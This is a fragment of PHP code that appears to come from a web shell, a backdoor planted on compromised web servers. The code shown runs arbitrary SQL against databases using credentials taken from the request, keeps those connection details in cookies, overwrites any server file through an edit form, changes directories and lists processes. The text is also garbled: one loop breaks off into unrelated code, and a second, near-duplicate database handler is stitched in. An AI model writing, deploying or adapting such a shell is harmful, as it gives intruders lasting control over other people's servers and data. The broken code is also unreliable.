$body = str_replace("&", "&", $body);
$body = str_replace(";", "; ", $body);
$s_result .= "<div class='info' id='" . $i . "'>" . $body . "</div>";
}
} elseif (isset($_REQUEST['db'])) {
// sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
$sqlhost = isset($_REQUEST['sqlhost']) ? ssc($_REQUEST['sqlhost']) : "";
$sqlport = isset($_REQUEST['sqlport']) ? ssc($_REQUEST['sqlport']) : "";
$sqluser = isset($_REQUEST['sqluser']) ? ssc($_REQUEST['sqluser']) : "";
$sqlpass = isset($_REQUEST['sqlpass']) ? ssc($_REQUEST['sqlpass']) : "";
$sqltype = isset($_REQUEST['sqltype']) ? ssc($_REQUEST['sqltype']) : "";
$show_form = true;
$show_dbs = true;
if (isset($_REQUEST['connect'])) {
$con = sql_connect($sqltype, $sqlhost, $sqluser, $sqlpass);
$sqlcode = isset($_REQUEST['sqlcode']) ? ssc($_REQUEST['sqlcode']) : "";
if ($con !== false) {
$show_form = false;
$s_result .= "<form action='" . $s_self . "db' method='post'>\n\t\t\t\t\t<input type='hidden' name='sqlhost' value='" . $sqlhost . "' />\n\t\t\t\t\t<input type='hidden' name='sqlport' value='" . $sqlport . "' />\n\t\t\t\t\t<input type='hidden' name='sqluser' value='" . $sqluser . "' />\n\t\t\t\t\t<input type='hidden' name='sqlpass' value='" . $sqlpass . "' />\n\t\t\t\t\t<input type='hidden' name='sqltype' value='" . $sqltype . "' />\n\t\t\t\t\t<input type='hidden' name='connect' value='connect' />\n\t\t\t\t\t<textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>" . $sqlcode . "</textarea>\n\t\t\t\t\t<p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />\n\t\t\t\t\t Separate multiple commands with a semicolon <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>\n\t\t\t\t\t</form>";
if (!empty($sqlcode)) {
$querys = explode(";", $sqlcode);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = sql_query($sqltype, $query, $con);
if ($hasil != false) {
$s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>" . $query . "; \n\t\t\t\t\t\t\t\t<span class='gaya'>[</span> ok <span class='gaya'>]</span></p>\n\t\t\t\t\t\t\t\t<table class='explore sortable' style='width:100%;'><tr>";
for ($i = 0; $i < sql_num_fields($sqltype, $hasil); $i++) {
$s_result .= "<th>" . @hss(sql_field_name($sqltype, $hasil, $i)) . "</th>";
}
$s_result .= "</tr>";
while ($rows = sql_fetch_data($sqltype, $hasil)) {
$s_result .= "</div>";
}
} elseif (is_dir($f)) {
chdir($f);
$pwd = cp(getcwd());
$s_result .= showdir($pwd, $s_prompt, $s_win);
}
} elseif (isset($_REQUEST['edit'])) {
$f = ss($_REQUEST['edit']);
$fc = "";
$fcs = "";
if (is_file($f)) {
$fc = file_get_contents($f);
}
if (isset($_REQUEST['fcsubmit'])) {
$fc = ssc($_REQUEST['fc']);
if ($filez = fopen($f, "w")) {
$time = date("d-M-Y H:i", time());
if (fwrite($filez, $fc)) {
$fcs = "file saved <span class=\"gaya\">@</span> " . $time;
} else {
$fcs = "failed to save";
}
fclose($filez);
} else {
$fcs = "permission denied";
}
}
$s_result .= "\t<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">\n\t\t\t\t<textarea id=\"fc\" name=\"fc\" class=\"evalcode\">" . htmlspecialchars($fc) . "</textarea>\n\t\t\t\t<p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"" . $f . "\" /></p>\n\t\t\t\t<p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />\n\t\t\t\t " . $fcs . "</p>\n\t\t\t\t<input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\n\t\t\t\t</form>\n\t\t\t\t\t\t\t";
} elseif (isset($_REQUEST['ps'])) {
$s_result = "<table class=\"explore sortable\">";
}
$s_sqlport = !empty($s_sql['port']) ? ":" . $s_sql['port'] : "";
$s_result .= "<p class='notif'>[" . $s_sql['type'] . "] " . $s_sql['user'] . "@" . $s_sql['host'] . $s_sqlport . "\n\t\t\t\t\t\t\t<span style='float:right;'><a href='" . $s_self . "x=db&connect=connect&sqlhost=" . $s_sql['host'] . "&sqlport=" . $s_sql['port'] . "&sqluser="******"&sqlpass="******"&sqltype=" . $s_sql['type'] . "' onclick='return false;'>connect</a> | <a href='" . $s_self . "x=db&dc=" . $c . "' onclick='return false;'>disconnect</a></span>\n\t\t\t\t\t\t\t</p>";
}
} else {
$s_sql['host'] = isset($_REQUEST['sqlhost']) ? ssc($_REQUEST['sqlhost']) : "";
$s_sql['port'] = isset($_REQUEST['sqlport']) ? ssc($_REQUEST['sqlport']) : "";
$s_sql['user'] = isset($_REQUEST['sqluser']) ? ssc($_REQUEST['sqluser']) : "";
$s_sql['pass'] = isset($_REQUEST['sqlpass']) ? ssc($_REQUEST['sqlpass']) : "";
$s_sql['type'] = isset($_REQUEST['sqltype']) ? ssc($_REQUEST['sqltype']) : "";
}
$s_show_form = true;
$s_show_dbs = true;
if (isset($_REQUEST['connect'])) {
$s_con = sql_connect($s_sql['type'], $s_sql['host'], $s_sql['user'], $s_sql['pass']);
$s_sqlcode = isset($_REQUEST['sqlcode']) ? urldecode(ssc($_REQUEST['sqlcode'])) : "";
if ($s_con !== false) {
if (isset($_REQUEST['sqlinit'])) {
$s_sql_cookie = function_exists(json_encode) && function_exists(json_decode) ? json_encode($s_sql) : serialize($s_sql);
$s_c_num = substr(md5(time() . rand(0, 100)), 0, 3);
while (isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])) {
$s_c_num = substr(md5(time() . rand(0, 100)), 0, 3);
}
setcookie("c[" . $s_c_num . "]", $s_sql_cookie, time() + $s_login_time);
}
$s_show_form = false;
$s_result .= "<form action='" . $s_self . "' method='post'>\n\t\t\t\t\t<input type='hidden' name='sqlhost' value='" . $s_sql['host'] . "' />\n\t\t\t\t\t<input type='hidden' name='sqlport' value='" . $s_sql['port'] . "' />\n\t\t\t\t\t<input type='hidden' name='sqluser' value='" . $s_sql['user'] . "' />\n\t\t\t\t\t<input type='hidden' name='sqlpass' value='" . $s_sql['pass'] . "' />\n\t\t\t\t\t<input type='hidden' name='sqltype' value='" . $s_sql['type'] . "' />\n\t\t\t\t\t<input type='hidden' name='x' value='db' />\n\t\t\t\t\t<input type='hidden' name='connect' value='connect' />\n\t\t\t\t\t<textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>" . $s_sqlcode . "</textarea>\n\t\t\t\t\t<p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />\n\t\t\t\t\t Separate multiple commands with a semicolon <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>\n\t\t\t\t\t</form>";
if (!empty($s_sqlcode)) {
$s_querys = explode(";", $s_sqlcode);
foreach ($s_querys as $s_query) {
if (trim($s_query) != "") {